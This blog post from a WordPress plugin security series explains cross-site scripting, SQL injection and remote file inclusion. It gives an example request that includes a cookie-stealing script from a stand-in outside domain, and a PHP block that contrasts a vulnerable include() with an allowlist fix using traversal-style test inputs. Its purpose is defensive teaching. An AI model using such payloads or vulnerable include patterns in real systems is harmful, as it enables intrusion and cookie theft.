WordPress Plugins Security: What is dangerous?

This week I started the series on WordPress plugin security. We have established that the golden rule in web security is to check the "gateways". That means monitoring the areas of a website that an attacker could use to send data to your website. I would like to delve deeper into this today.

WordPress support expert Podz asks on his blog, "What is dangerous?"

The answer lies in understanding the attack vectors. Attack vectors such as Cross-Site Scripting, SQL Injection and Remote File Inclusion are some of the most used methods to attack a website. If you understand the principles on which they are based, you will have a better understanding of what you need to look for in a plugin. So let's get to it, shall we?

Cross-Site Scripting (XSS)

Cross-Site Scripting has been described by Network World as the "greatest threat of security". Cross-site scripting is a general term that refers to the injection of JavaScript into a page. Since JavaScript allows the browser to do a wide variety of things, including potentially executing code on the file system, giving an attacker a vector to get that code onto your computer or website is dangerous. An example of XSS would be the flaw in Democracy 1.2. A common entry point for XSS is an HTML form (contact form, tagboard, etc.) or the address bar.

SQL Injection

From a programming point of view, SQL injection occurs when input from the browser (from a form, the address bar or anywhere else) is not properly filtered to make it "safe" and is then fed directly into a database. This attack vector would allow the content of a website (one that is backed by a database) to be altered or even deleted. It could also be used in combination with XSS to inject malicious JavaScript or server-side scripts into the content of a page.

Remote File Inclusion

A third attack vector that should be avoided is remote file inclusion (RFI). This means using a PHP function (include()) to insert a piece of code hosted on any site and have it executed on the remote server. In other words, an attacker can write a small script that records IP addresses, cookies, etc., and if they can get a PHP script included on your site, it can provide valuable information to the attacker. RFI is usually found when user input (form, address bar) is passed directly to an include().

For example, a link of this type: http://example.com/?page=about could have some code behind it that provides the right content. This kind of sloppy code is more common than you imagine. The developer's intent could be, in this example, to include the contents of about.php in the main page. But what would happen if I sent this request from my browser:
http://example.com/?page=http://mydomain.com/script_lectura_cookie_maliciosa
Then your page would actually be executing this instruction:

A very dangerous issue.
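
The include() pattern described above next to an allowlist-based replacement, as an added example that is not code from the original article; the page names, the pages/ directory and the function names are assumptions made for illustration.

```php
<?php
// Added example, not code from the original article. Page names, the pages/
// directory and both function names are assumptions for illustration.

// VULNERABLE pattern described above (shown for contrast, never called):
// the request value goes straight into include(), so a URL or a path such
// as ../../wp-config is accepted just like "about".
function render_page_unsafe(string $page): void
{
    include $page . '.php';
}

// HARDENED: the request value is only a key into a fixed allowlist.
// Nothing the visitor sends ever becomes part of the file path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?page[]=x) and any key outside the allowlist are rejected.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$requested];
}

// Constructed sample inputs, including the request shown in the article.
$samples = [
    'about',
    'http://mydomain.com/script_lectura_cookie_maliciosa',
    '../../wp-config',
    "about\0",
    ['about'],
];

foreach ($samples as $input) {
    $path  = resolve_page($input, __DIR__ . '/pages');
    $label = json_encode($input, JSON_UNESCAPED_SLASHES);
    printf("%-58s => %s\n", $label, $path ?? 'rejected (serve a 404)');
}
```

Keeping `allow_url_include` disabled in php.ini (its default) blocks the remote case, but the allowlist is still needed because local paths remain includable.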

How does this affect WordPress?

In the following articles of this series we will take a look at the security implications specific to WordPress plugins. Any plugin that is used should first be inspected to see whether it allows interaction with the user. If it allows user interaction, it might be prone to one of these attack vectors.

Do not assume, however, that a plugin that accepts interaction is dangerous. It is up to the code and the developer to handle user input appropriately and securely.

Read other articles in the series about WordPress plugin security:

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. Less is more

NOTICE: This publication is two or more years old. If it is about code or a plugin, it might not work in the latest versions of WordPress, and if it is a news story, it might be obsolete. Do not say we did not warn you.
